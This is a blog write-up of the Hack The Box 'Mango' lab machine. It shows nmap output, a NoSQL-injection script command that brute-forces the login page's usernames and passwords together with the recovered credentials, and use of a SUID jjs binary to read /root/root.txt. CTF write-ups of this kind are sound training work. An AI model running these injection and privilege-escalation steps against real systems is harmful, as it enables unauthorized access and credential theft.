Skip to content

Hack The Box — Mango Writeup without Metasploit

Mango was done a bit early when it was an active one. There was no need to use Metasploit in this box as far as I know of.

nmap

root@kali:~# nmap -sC -sV 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 05:22 EDT
Nmap scan report for 10.10.10.162
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Mango | Search Base | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 |_ssl-date: TLS randomness does not represent time | tls-alpn: | http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.87 seconds
root@kali:~#

Had edit hostfile

checked with port 80 nothing was there. 443 we hit the jackpot.

There was somethings in the Analytics page. I couldn’t really get anything from there. Since we have edited the host file

Since there was too many mangoes and also this is a CTF they will give you hints, felt like should try something with mongo db. After googling for sometime found a link which can crack the password and user of mongodb.

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

can download a run it. python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST

First needed to find the username.

root@kali:~/HTB/mango/Nosql-MongoDB-injection-username-password-enumeration# python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
No pattern starts with 't'
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
No pattern starts with 'A'
No pattern starts with 'B'
No pattern starts with 'C'
No pattern starts with 'D'
No pattern starts with 'E'
No pattern starts with 'F'
No pattern starts with 'G'
No pattern starts with 'H'
No pattern starts with 'I'
No pattern starts with 'J'
No pattern starts with 'K'

Username was mango now for the password

root@kali:~/HTB/mango/Nosql-MongoDB-injection-username-password-enumeration# python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
No pattern starts with 'A'
No pattern starts with 'B'
No pattern starts with 'C'
No pattern starts with 'D'
No pattern starts with 'E'
No pattern starts with 'F'
No pattern starts with 'G'
No pattern starts with 'H'
No pattern starts with 'I'
No pattern starts with 'J'
No pattern starts with 'K'
No pattern starts with 'L'
No pattern starts with 'M'
No pattern starts with 'N'
No pattern starts with 'O'
No pattern starts with 'P'
No pattern starts with 'Q'
No pattern starts with 'R'
No pattern starts with 'S'

mango : h3mXK8RhU~f{]f5H seems like we got everything we need. When logged in found a page saying sorry. Well yea I felt sorry too for my self after a long hard road back to enumeration I guess

There was an ssh login thought would try it.

Had to get admin account to read the user flag.

was checking the db, found the credentials

So now that was done. Need the root flag

strange thing was I couldn’t find python in this box. so turned to LinuxEnum.sh

Found interesting SUID files

found in https://gtfobins.github.io/gtfobins/jjs/

dmin@mango:/usr/lib/jvm/java-11-openjdk-amd64/bin$ ./jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> while ((line = br.readLine()) != null) { print(line); }
:1 ReferenceError: "br" is not defined
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }' | jjs
…>
jdk.nashorn.internal.runtime.ParserException: :1:62 Missing close quote
while ((line = br.readLine()) != null) { print(line); }' | jjs
^
jjs> while ((line = br.readLine()) != null) { print(line);
…>
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a8ef79a7a2fbb01ea81688424e9ab15

Tried to read the file using jjs and it worked.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: